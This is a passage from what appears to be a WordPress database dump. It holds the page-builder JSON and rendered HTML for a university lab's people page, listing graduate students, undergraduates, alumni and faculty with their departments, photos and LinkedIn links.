Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c373\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c374\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c375\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c373\",\"index\":2,\"id\":\"182-c376\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c373\",\"index\":3,\"id\":\"182-c377\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c373\",\"index\":1,\"id\":\"182-c378\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c379\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c380\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c381\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c379\",\"index\":2,\"id\":\"182-c382\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c379\",\"index\":3,\"id\":\"182-c383\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c379\",\"index\":1,\"id\":\"182-c384\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c98\",\"parentId\":\"182-c97\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c97\",\"parentId\":\"182-c96\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c96\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c169\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c169\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c168\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c177\",\"parentId\":\"182-c176\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c176\",\"parentId\":\"182-c175\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c175\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c256\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c257\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c258\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c256\",\"index\":2,\"id\":\"182-c259\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c256\",\"index\":1,\"id\":\"182-c261\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c262\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c263\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c264\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c262\",\"index\":2,\"id\":\"182-c265\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c262\",\"index\":1,\"id\":\"182-c267\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c268\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c269\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c270\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c268\",\"index\":2,\"id\":\"182-c271\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c268\",\"index\":1,\"id\":\"182-c273\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c274\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c275\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c276\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c274\",\"index\":2,\"id\":\"182-c277\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c274\",\"index\":1,\"id\":\"182-c279\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c385\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c386\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c387\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c385\",\"index\":2,\"id\":\"182-c388\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c385\",\"index\":1,\"id\":\"182-c389\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c390\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c391\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c392\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c390\",\"index\":2,\"id\":\"182-c393\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c390\",\"index\":1,\"id\":\"182-c394\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c395\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c396\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c397\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c395\",\"index\":2,\"id\":\"182-c398\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c395\",\"index\":1,\"id\":\"182-c399\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c400\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c401\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c402\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c400\",\"index\":2,\"id\":\"182-c403\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c405\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c406\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c407\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c405\",\"index\":2,\"id\":\"182-c408\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c405\",\"index\":1,\"id\":\"182-c409\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c410\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c411\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c412\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c410\",\"index\":2,\"id\":\"182-c413\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c410\",\"index\":1,\"id\":\"182-c414\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c255\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c254\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c282\",\"parentId\":\"182-c281\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c281\",\"parentId\":\"182-c280\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c280\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-09-29 22:15:14','2023-09-30 02:15:14','',562,'https://gsudice.dataconn.net/?p=1617',0,'revision','',0),(1618,1,'2023-09-29 22:15:14','2023-09-30 02:15:14','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c425\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c425 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c451\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c451 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c452-outer\">\n <div data-colibri-id=\"182-c452\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c452 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c453\" class=\"h-global-transition-all h-heading style-986 style-local-182-c453 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-986 style-local-182-c453\">\n <!---->\n <!---->\n <h2 class=\"\">Faculty</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c426\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c426 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c427-outer\">\n <div data-colibri-id=\"182-c427\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c427 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c428\" class=\"d-block style-973 style-local-182-c428 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg\" class=\"wp-image-629 style-973-image style-local-182-c428-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c428-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c429\" class=\"h-global-transition-all h-heading style-974 style-local-182-c429 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c429\">\n <!---->\n <!---->\n <h4 class=\"\">Chetan Tiwari</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c430\" class=\"h-text h-text-component style-975 style-local-182-c430 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Director</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c431\" class=\"h-text h-text-component style-976 style-local-182-c431 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c432\" class=\"style-977 style-local-182-c432 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a 